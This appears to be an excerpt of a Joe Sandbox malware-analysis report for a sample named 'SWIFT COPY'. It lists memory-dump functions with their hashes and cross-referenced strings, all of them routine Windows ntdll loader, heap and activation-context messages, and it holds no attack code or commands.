                                                                                              • Instruction Fuzzy Hash: FC51C5712083059FE725EF28C881B6BB7E8FFC4A4CF50491DF9859B264DA34E944CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                              • API String ID: 0-1109411897
                                                                                              • Opcode ID: 7b656f3a11d9aee672084f6c34bb6b3a0247433390e6a290888db56a82edcbd5
                                                                                              • Instruction ID: 1fb32aa15cd445497229b65af3dfbeedb77afcdcd6ca57041e0458e4d212b83c
                                                                                              • Opcode Fuzzy Hash: 7b656f3a11d9aee672084f6c34bb6b3a0247433390e6a290888db56a82edcbd5
                                                                                              • Instruction Fuzzy Hash: CFA24874E0562A8FDF64DF18C9887ADBBB9AF85308F1442E9D90DA7250DB349E81CF44
                                                                                              Strings
                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 013A2160, 013A219A, 013A21BA
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013A21BF
                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 013A219F
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 013A2165
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 013A2180
                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 013A2178
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                              • API String ID: 0-861424205
                                                                                              • Opcode ID: 195e2c229bda1ebbc2b85f56aefa429cfcc3ea43206ade4594dea26169eba3ab
                                                                                              • Instruction ID: 38c03e46cc372fdbff9bdcbf1d3d9f5e579935074d15b542d072069e8c0fe9c6
                                                                                              • Opcode Fuzzy Hash: 195e2c229bda1ebbc2b85f56aefa429cfcc3ea43206ade4594dea26169eba3ab
                                                                                              • Instruction Fuzzy Hash: 4F31F83AF4021577F7258A998C85F5B7B7CDB95A5CF0A8059FB046B249E270AE00C7E1
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013A8181, 013A81F5
                                                                                              • LdrpInitializeImportRedirection, xrefs: 013A8177, 013A81EB
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0136C6C3
                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 013A81E5
                                                                                              • LdrpInitializeProcess, xrefs: 0136C6C4
                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 013A8170
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                              • API String ID: 0-475462383
                                                                                              • Opcode ID: 8b3988210a93fc4701be6a728ade3391fbfe2a5c43b247a3504abc1d03f0e332
                                                                                              • Instruction ID: 1b83a0440878d8ec4b5421789ed4646acc06b7f5aaa25999ce5e75f98e8598d3
                                                                                              • Opcode Fuzzy Hash: 8b3988210a93fc4701be6a728ade3391fbfe2a5c43b247a3504abc1d03f0e332
                                                                                              • Instruction Fuzzy Hash: AD311371644306ABD324EF2DD846E2A7BE4FF94B28F444558F9856B395E620EC04C7A2
                                                                                              APIs
                                                                                                • Part of subcall function 01372DF0: LdrInitializeThunk.NTDLL ref: 01372DFA
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370BA3
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370BB6
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370D60
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01370D74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 1404860816-0
                                                                                              • Opcode ID: 8fa13d1850be6ac665e9770f8a822f71cbebca4b73a6a9aa22266963a5faa6a5
                                                                                              • Instruction ID: a51016a00688c1a96c4b08e346b89b2ef9d6a8ee3e133f6fd103f598a1b41876
                                                                                              • Opcode Fuzzy Hash: 8fa13d1850be6ac665e9770f8a822f71cbebca4b73a6a9aa22266963a5faa6a5
                                                                                              • Instruction Fuzzy Hash: 34427C71900715DFDB65CF28C880BAAB7F4FF05318F1445AAE989EB641E774AA84CF60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                              • API String ID: 0-379654539
                                                                                              • Opcode ID: f95c7a0ef951c85f5065c737ea552e12744549381e6a534903036d604cea9519
                                                                                              • Instruction ID: 86472473ec2af1cc4ed198ef13f10c0d774958967bde70d2d21db08f679a7612
                                                                                              • Opcode Fuzzy Hash: f95c7a0ef951c85f5065c737ea552e12744549381e6a534903036d604cea9519
                                                                                              • Instruction Fuzzy Hash: 34C17774108386DFDB21CF58C044B6ABBE8BF84708F04496AF9D5DB691E734C949CB5A
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01368421
                                                                                              • @, xrefs: 01368591
                                                                                              • LdrpInitializeProcess, xrefs: 01368422
                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0136855E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1918872054
                                                                                              • Opcode ID: cf9b6303a1b1b58de4b2735eeb3b26b7b73f5c33253aa425ed4c33191f818843
                                                                                              • Instruction ID: 0596d31e343dfa8ea4edab69d4a649879ac77cea4ee044d7fbab70821b402acb
                                                                                              • Opcode Fuzzy Hash: cf9b6303a1b1b58de4b2735eeb3b26b7b73f5c33253aa425ed4c33191f818843
                                                                                              • Instruction Fuzzy Hash: F5918C71508345AFD722DE29CC40FABBAECFF88748F80496EFA8492155E774D9448B62
                                                                                              Strings
                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013A21D9, 013A22B1
                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013A22B6
                                                                                              • SXS: %s() passed the empty activation context, xrefs: 013A21DE
                                                                                              • .Local, xrefs: 013628D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                              • API String ID: 0-1239276146
                                                                                              • Opcode ID: 7a6f8cb5752118378fc269ae60bee4a184adf74e600df2e0840cbe4f5e052890
                                                                                              • Instruction ID: 04eb758ad0cf0dcbc0e4bef8feac3b5f9edb0130b9ddb180b689269f2405241d
                                                                                              • Opcode Fuzzy Hash: 7a6f8cb5752118378fc269ae60bee4a184adf74e600df2e0840cbe4f5e052890
                                                                                              • Instruction Fuzzy Hash: 03A1A03590022ADBDB25CF68CC84BAAB7B9FF58358F1581E9D948A7255D7309E80CF90
                                                                                              Strings
                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0139106B
                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013910AE
                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01391028
                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01390FE5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                              • API String ID: 0-1468400865
                                                                                              • Opcode ID: 66cc5495459f882854bac93ca264e019f3095b9f8963526811cc1853698ee1f8
                                                                                              • Instruction ID: f112e8489e77152f6fe8054bea82eec31e1fd0a85d9e8d2d77836d5655a56fb0
                                                                                              • Opcode Fuzzy Hash: 66cc5495459f882854bac93ca264e019f3095b9f8963526811cc1853698ee1f8
                                                                                              • Instruction Fuzzy Hash: F071B1B1904305EFDB21EF18C885B977FA8AF94768F400568F9498B286D734D688CBD6
                                                                                              Strings
                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0139A992
                                                                                              • apphelp.dll, xrefs: 01352462
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0139A9A2
                                                                                              • LdrpDynamicShimModule, xrefs: 0139A998
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-176724104
                                                                                              • Opcode ID: 64aafe40acd28b51ff12d8198a4c4f940b534ea2dd4d7db42291cc71711e0a55
                                                                                              • Instruction ID: 0e9ab2f0c63f112b36c14631ba74845a01e3f64f770fef6799b29d813c715e53
                                                                                              • Opcode Fuzzy Hash: 64aafe40acd28b51ff12d8198a4c4f940b534ea2dd4d7db42291cc71711e0a55
                                                                                              • Instruction Fuzzy Hash: B23148B1A00206EBEF319F5DD881E6A7BF5FB84B0CFA60119ED01AB265C7B459C1C780
                                                                                              Strings
                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 013B20F3
                                                                                              • LdrpInitializationFailure, xrefs: 013B20FA
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013B2104
                                                                                              • `,, xrefs: 013B20EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$`,$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1034781813
                                                                                              • Opcode ID: 797cddefd6a773f18d185de77540956d8c0ac7ea2a1d8325e884595218445098
                                                                                              • Instruction ID: ff47fddf3f0e0373a38ca9c5f7c90104c1c87f25807bc529de20d2bb7bb99333
                                                                                              • Opcode Fuzzy Hash: 797cddefd6a773f18d185de77540956d8c0ac7ea2a1d8325e884595218445098
                                                                                              • Instruction Fuzzy Hash: 85F0C875740308ABE734EA4DDC53FDA3B68EB44B5CF500059FB006B695E2B0A540C691
                                                                                              Strings
                                                                                              • HEAP[%wZ]: , xrefs: 01343255
                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0134327D
                                                                                              • HEAP: , xrefs: 01343264
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                              • API String ID: 0-617086771
                                                                                              • Opcode ID: af555e3471090f7acedc67aefa7732117734a1a662628b03493d95bb86d2980b
                                                                                              • Instruction ID: c9eac1ab2f4e73761479750c63142cd3b0fb2a31b6a6b0c7535422d1eac3a759
                                                                                              • Opcode Fuzzy Hash: af555e3471090f7acedc67aefa7732117734a1a662628b03493d95bb86d2980b
                                                                                              • Instruction Fuzzy Hash: A792DD70A04259DFEB25CF68D440BAEBBF1FF08318F188099E899AB791D734A945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-4253913091
                                                                                              • Opcode ID: 128d1bd4db8a27536ceb9209a81feeb498f48938cd6cbfb4a832c1fbfae41645
                                                                                              • Instruction ID: 7b1e87b9fb5acd0dbf002e6939bc96c9215e7df73443ad9b85448a4e71472ec4
                                                                                              • Opcode Fuzzy Hash: 128d1bd4db8a27536ceb9209a81feeb498f48938cd6cbfb4a832c1fbfae41645
                                                                                              • Instruction Fuzzy Hash: D9F1AE74700606DFEB1ACF68C894BAABBF5FF44308F1441A9E6469B791D734E981CB90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $@
                                                                                              • API String ID: 0-1077428164
                                                                                              • Opcode ID: dea3436014a31bbbeb8bdd7df6d4559f06dea6cf9bcf25560306bdf1e5e0e1c0
                                                                                              • Instruction ID: d9ed0e987024ecb419012b360947b20f02ee4befec80cfc3477c9dac3388215b
                                                                                              • Opcode Fuzzy Hash: dea3436014a31bbbeb8bdd7df6d4559f06dea6cf9bcf25560306bdf1e5e0e1c0
                                                                                              • Instruction Fuzzy Hash: 34C281716083459FEB65CF28C841FABBBE5AF88B58F44892DED89C7241D734D805CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                              • API String ID: 0-2779062949
                                                                                              • Opcode ID: 2409953fba2b2a94b7c3248af63f6ce2b5d3df913b5f6be0ffab2bf0659d8cf0
                                                                                              • Instruction ID: 73bf162ba051c7798c9f110dd1be0410826349e9b93091277540786a0d4c1083
                                                                                              • Opcode Fuzzy Hash: 2409953fba2b2a94b7c3248af63f6ce2b5d3df913b5f6be0ffab2bf0659d8cf0
                                                                                              • Instruction Fuzzy Hash: AEA16B719016299BDB31EF68CC88BEAB7B8EF44718F1001E9E909A7250D7359EC5CF60
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0139A121
                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0139A10F
                                                                                              • LdrpCheckModule, xrefs: 0139A117
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-161242083
                                                                                              • Opcode ID: fd69de7be57cf0a9b0dbc8c3700f283aebe6fd753acac63950c2d3d67772fc41
                                                                                              • Instruction ID: fa2ae30bdf85a419e1c3298e9955f12697a7d8ceb2c996766e0ffca8baee2a56
                                                                                              • Opcode Fuzzy Hash: fd69de7be57cf0a9b0dbc8c3700f283aebe6fd753acac63950c2d3d67772fc41
                                                                                              • Instruction Fuzzy Hash: 8F71D070A002069FDF29DF6CC981AAEB7F4FB44B08F55442DE802AB755E775AD81CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-1334570610
                                                                                              • Opcode ID: 57fbf277f1fe361bbec769282431cc4a0d5257178802b395dda913a75493cab6
                                                                                              • Instruction ID: b1d88d11ec399d86b1c7e3a85ce8655b75a964a2658ca884b3faecc71c670f3f
                                                                                              • Opcode Fuzzy Hash: 57fbf277f1fe361bbec769282431cc4a0d5257178802b395dda913a75493cab6
                                                                                              • Instruction Fuzzy Hash: AC61AE707003059FDB29DF28C480BAABBE5FF4470CF14855AE5598B692D770E881CB95
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 013A82E8
                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 013A82DE
                                                                                              • Failed to reallocate the system dirs string !, xrefs: 013A82D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1783798831
                                                                                              • Opcode ID: a187dc5a48dd620ba9794e93ea06b5388ae8a209bd356adb8465186b9d633018
                                                                                              • Instruction ID: e7cbe6094b0673484db4bf5a31ae15fe55603c350e063d631084b82c43fea645
                                                                                              • Opcode Fuzzy Hash: a187dc5a48dd620ba9794e93ea06b5388ae8a209bd356adb8465186b9d633018
                                                                                              • Instruction Fuzzy Hash: 0A41D271500315ABD731EF68D844B5B77E8FF48B58F40892AF988932A4E774E840CB91
                                                                                              Strings
                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 013EC1C5
                                                                                              • @, xrefs: 013EC1F1
                                                                                              • PreferredUILanguages, xrefs: 013EC212
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                              • API String ID: 0-2968386058
                                                                                              • Opcode ID: 4b87491b4c9e2c61f499081fb3d38cb37ba844fdc90116096894edde6deebc17
                                                                                              • Instruction ID: e1a1a066c37836a78ba822bfccad9f86e46d1d47a4928ba0660d3683eaf1b0a1
                                                                                              • Opcode Fuzzy Hash: 4b87491b4c9e2c61f499081fb3d38cb37ba844fdc90116096894edde6deebc17
                                                                                              • Instruction Fuzzy Hash: A4417372E00329EBDF15DBD8C855FEEBBF8AB14708F14406AE609B7280D7749A44CB54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                              • API String ID: 0-1373925480
                                                                                              • Opcode ID: a54705705040d5069ab4056b19b16cb72ff44e5f275ee3ceb5a1750fdce91bff
                                                                                              • Instruction ID: 44ecaf8d2ab334d6b917798e7eb881d9b7ad9291319e74d4699782f3915fb295
                                                                                              • Opcode Fuzzy Hash: a54705705040d5069ab4056b19b16cb72ff44e5f275ee3ceb5a1750fdce91bff
                                                                                              • Instruction Fuzzy Hash: FE410231A042588BEB26DB98C850BADBBB9FFA5B48F14045ED941EB781DA349D01CB10
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 013B4899
                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 013B4888
                                                                                              • LdrpCheckRedirection, xrefs: 013B488F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                              • API String ID: 0-3154609507
                                                                                              • Opcode ID: af589fb566e65f50f7d0632e6d86efce5ce968799367faa6c49e2cd5825c3b2e
                                                                                              • Instruction ID: 698d1fe1773484ad9a9521a1bfb8d58dbd35f98199148c1471bc6ca66eca33a8
                                                                                              • Opcode Fuzzy Hash: af589fb566e65f50f7d0632e6d86efce5ce968799367faa6c49e2cd5825c3b2e
                                                                                              • Instruction Fuzzy Hash: F941D432A002519BCB21CE1CE8C1AA67FE8AF89658B050559EE5AD7B53F731D800CB95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-2558761708
                                                                                              • Opcode ID: 44afdbf642fa5f298b026e2268928421912a0a2d555eaaf75e4cfe8c2d98f963
                                                                                              • Instruction ID: 64b49f6df1ac1cfa71c0d4741dd9e593d4f3ef9349c878d15a00726ccd002e9f
                                                                                              • Opcode Fuzzy Hash: 44afdbf642fa5f298b026e2268928421912a0a2d555eaaf75e4cfe8c2d98f963
                                                                                              • Instruction Fuzzy Hash: 4E11E1313151469FDB6EDA1CC450BB6B3E8EF4061EF18812AF606DB651DB30E880C759
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: #%u
                                                                                              • API String ID: 48624451-232158463
                                                                                              • Opcode ID: 491dfe7ec627b22e731667f6267e4ea450fe7e943e24622270ba6f158c28c0e7
                                                                                              • Instruction ID: e3c416eb66cdce5540786556cfac5602d260649bf71b84b6020105dad79e528e
                                                                                              • Opcode Fuzzy Hash: 491dfe7ec627b22e731667f6267e4ea450fe7e943e24622270ba6f158c28c0e7
                                                                                              • Instruction Fuzzy Hash: 0D711871A0014A9FDF15DFACC990BAEB7F8FF18708F144065EA05A7251EA34ED41CB61
                                                                                              Strings
                                                                                              • LdrResSearchResource Exit, xrefs: 0133AA25
                                                                                              • LdrResSearchResource Enter, xrefs: 0133AA13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                              • API String ID: 0-4066393604
                                                                                              • Opcode ID: a40d2b2c76c25561abe1c29de10ba242b393bd192291e6753f36fe40aef9c53f
                                                                                              • Instruction ID: 32548bdedd7eba818de070c0d18cec0a30218b320ef288835c1fe9c39dc6fd61
                                                                                              • Opcode Fuzzy Hash: a40d2b2c76c25561abe1c29de10ba242b393bd192291e6753f36fe40aef9c53f
                                                                                              • Instruction Fuzzy Hash: 1BE18271E00619AFEF26CFADC980BAEBBB9FF84318F104526E942E7251D7349941CB54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$`
                                                                                              • API String ID: 0-197956300
                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                              • Instruction ID: 8608576899f44c54d240c72fb39c83d2872c8bb0ffd2b8701c184fb9c5dd5ce5
                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                              • Instruction Fuzzy Hash: 2FC1BF312043469BEB25CF28C845B6BBBE5AFC435CF084A2DF69A9B290D774E509CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Legacy$UEFI
                                                                                              • API String ID: 2994545307-634100481
                                                                                              • Opcode ID: 4f1e11fe5a6cdd0a2e37309049e9dbd426758fddc791bad4662865342816b90b
